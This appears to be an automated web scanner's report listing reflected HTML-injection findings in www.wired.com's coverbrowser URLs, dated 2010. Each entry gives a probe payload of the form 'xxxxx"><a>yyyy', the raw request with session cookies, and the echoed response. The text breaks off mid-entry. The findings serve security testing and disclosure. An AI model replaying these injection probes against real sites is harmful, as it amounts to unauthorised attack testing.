<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser2face"><a>4498e865eb c_1996"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e82c0"><a>d25d8be8dce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/1996e82c0"><a>d25d8be8dce HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:12:09 GMT Date: Mon, 22 Nov 2010 01:08:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_1996e82c0"><a>d25d8be8dce"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a17"><a>f51bea8abc9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser70a17"><a>f51bea8abc9/1997 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:11:38 GMT Date: Mon, 22 Nov 2010 01:07:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser70a17"><a>f51bea8abc9 c_1997"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9bb"><a>55ff099ec8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/1997ed9bb"><a>55ff099ec8c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:15 GMT Date: Mon, 22 Nov 2010 01:08:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_1997ed9bb"><a>55ff099ec8c"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc6db"><a>7a1cb95c9c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowserfc6db"><a>7a1cb95c9c8/1998 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:11:37 GMT Date: Mon, 22 Nov 2010 01:07:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowserfc6db"><a>7a1cb95c9c8 c_1998"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e0ca"><a>d40bc3e4695 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/19984e0ca"><a>d40bc3e4695 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:08 GMT Date: Mon, 22 Nov 2010 01:08:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_19984e0ca"><a>d40bc3e4695"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3335a"><a>6fb29d915a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser3335a"><a>6fb29d915a6/1999 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:11:15 GMT Date: Mon, 22 Nov 2010 01:07:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser3335a"><a>6fb29d915a6 c_1999"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff2c"><a>a871307756c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/19995ff2c"><a>a871307756c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:11:54 GMT Date: Mon, 22 Nov 2010 01:08:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_19995ff2c"><a>a871307756c"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3c2"><a>0a5f2735ed6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowsercd3c2"><a>0a5f2735ed6/2000 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:11:27 GMT Date: Mon, 22 Nov 2010 01:07:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowsercd3c2"><a>0a5f2735ed6 c_2000"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65112"><a>9f2ff113a98 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/200065112"><a>9f2ff113a98 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:11:44 GMT Date: Mon, 22 Nov 2010 01:08:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_200065112"><a>9f2ff113a98"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e90"><a>6d2dca21409 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser94e90"><a>6d2dca21409/2001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=226 Expires: Mon, 22 Nov 2010 01:11:11 GMT Date: Mon, 22 Nov 2010 01:07:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser94e90"><a>6d2dca21409 c_2001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea8f1"><a>e333a4050b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/2001ea8f1"><a>e333a4050b9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:01 GMT Date: Mon, 22 Nov 2010 01:08:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_2001ea8f1"><a>e333a4050b9"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b9ec"><a>4c7ba26d603 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser8b9ec"><a>4c7ba26d603/2002 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:11:26 GMT Date: Mon, 22 Nov 2010 01:07:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser8b9ec"><a>4c7ba26d603 c_2002"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81f35"><a>ab191808721 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/200281f35"><a>ab191808721 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:05 GMT Date: Mon, 22 Nov 2010 01:08:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_200281f35"><a>ab191808721"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e568a"><a>3927a2b838d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowsere568a"><a>3927a2b838d/2003 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=238 Expires: Mon, 22 Nov 2010 01:11:23 GMT Date: Mon, 22 Nov 2010 01:07:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowsere568a"><a>3927a2b838d c_2003"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad8e"><a>70680a83295 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/20037ad8e"><a>70680a83295 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:05 GMT Date: Mon, 22 Nov 2010 01:08:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_20037ad8e"><a>70680a83295"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d956"><a>451286b1b41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser3d956"><a>451286b1b41/2004 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Mon, 22 Nov 2010 01:11:18 GMT Date: Mon, 22 Nov 2010 01:07:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser3d956"><a>451286b1b41 c_2004"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4001"><a>2a88692267f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/2004c4001"><a>2a88692267f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:11:43 GMT Date: Mon, 22 Nov 2010 01:08:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_2004c4001"><a>2a88692267f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b232f"><a>d682f6a1f4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowserb232f"><a>d682f6a1f4b/2005 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
